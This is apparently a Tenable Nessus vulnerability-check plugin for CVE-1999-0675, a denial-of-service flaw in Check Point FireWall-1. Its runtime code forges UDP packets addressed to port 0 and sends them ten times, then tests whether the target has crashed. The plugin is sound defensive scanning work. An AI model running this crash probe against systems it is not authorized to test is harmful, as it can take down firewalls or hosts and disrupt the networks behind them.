Source: nessus | This script is Copyright (C) 1999-2019 Tenable Network Security, Inc. | FIREWALL1_DOS.NASL
History: Aug 20, 1999 - 12:00 a.m.

Check Point FireWall-1 UDP Port 0 DoS

1999-08-20 00:00:00
This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
www.tenable.com

It was possible to crash either the remote host or the firewall between the scanner and the remote host by sending a UDP packet addressed to port 0.

This flaw may allow an attacker to shut down your network.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration pass: when `description` is set, the plugin only declares its
# metadata and leaves through the exit(0) at the end of this block, so nothing
# below this block runs during registration.
if (description)
{
 script_id(10074);
 script_version("1.31");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 # Public identifiers a reader can use to correlate this finding with
 # advisories and asset records.
 script_cve_id("CVE-1999-0675");
 script_bugtraq_id(576);

 script_name(english:"Check Point FireWall-1 UDP Port 0 DoS");
 script_summary(english:"Crashes the remote host by sending a UDP packet going to port 0");

 script_set_attribute(attribute:"synopsis", value:"The remote firewall has a denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash either the remote host or the firewall in
between us and the remote host by sending an UDP packet going to port
0.

This flaw may allow an attacker to shut down your network.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Aug/94");
 # The remediation text covers both outcomes the check cannot tell apart: the
 # device that stopped responding may be the target or a firewall in the path.
 script_set_attribute(attribute:"solution", value:
"Contact your firewall vendor if it was the firewall which crashed, or
filter incoming UDP traffic if the remote host crashed.");
 # CVSS v2 base vector: network-reachable, low complexity, no authentication,
 # complete availability impact and no confidentiality or integrity impact.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 # CVSS v2 temporal vector: exploitability unproven (E:U), official fix
 # available (RL:OF), report confirmed (RC:C).
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/08/09");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/08/20");

 # Marked as a potential finding. NOTE(review): this fits a check that infers
 # the flaw from loss of reachability rather than from a version or banner;
 # treat a hit as something to confirm on the device itself.
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # ACT_KILL_HOST declares that running this plugin can take the target down.
 # NOTE(review): scanners normally withhold this category unless the scan
 # policy allows disruptive checks -- confirm against the policy in use
 # before scanning production.
 script_category(ACT_KILL_HOST);
 script_family(english:"Firewalls");

 script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");

 # Scheduling gate: the plugin depends on the Settings/ParanoidReport KB key.
 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

# Runtime gate 1: stop with AUDIT_PARANOID unless report_paranoia is at least 2.
if (report_paranoia < 2)
{
  audit(AUDIT_PARANOID);
}

# Runtime gate 2: the header built below is IPv4 only, so IPv6 targets are skipped.
if (TARGET_IS_IPV6)
{
  exit(0);
}

# Opens the liveness bracket that end_denial() closes further down.
start_denial();

# IPv4 header for the probe. ip_len 28 = 20-byte IP header (ip_hl 5 words)
# plus the 8-byte UDP header, i.e. a datagram with no payload.
# NOTE(review): no ip_dst is passed; presumably the library fills in the
# scan target -- confirm.
ip_hdr = forge_ip_packet(
  ip_v   : 4,
  ip_hl  : 5,
  ip_tos : 0,
  ip_id  : 0x4321,
  ip_len : 28,
  ip_off : 0,
  ip_p   : IPPROTO_UDP,
  ip_src : compat::this_host(),
  ip_ttl : 0x40
);

# UDP header on top of it: destination port 0, length 8 (header only).
probe = forge_udp_packet(
  ip       : ip_hdr,
  uh_sport : 1234,
  uh_dport : 0,
  uh_ulen  : 8
);

# The probe is sent 10 times; pcap_active:FALSE is passed so, presumably, no
# reply is awaited -- the verdict comes from the liveness check below.
send_packet(probe, pcap_active:FALSE) x 10;

# Pause for 5 seconds before testing reachability.
sleep(5);

# The verdict rests on reachability alone: an unrelated outage or a filtering
# device in the path looks the same as a crash, which is consistent with the
# metadata marking this finding as potential.
still_up = end_denial();
if (!still_up)
{
  # Record the host as dead in the KB (presumably so later plugins can skip
  # it -- confirm) and report the finding on udp/0.
  set_kb_item(name:"Host/dead", value:TRUE);
  security_hole(port:0, proto:"udp");
}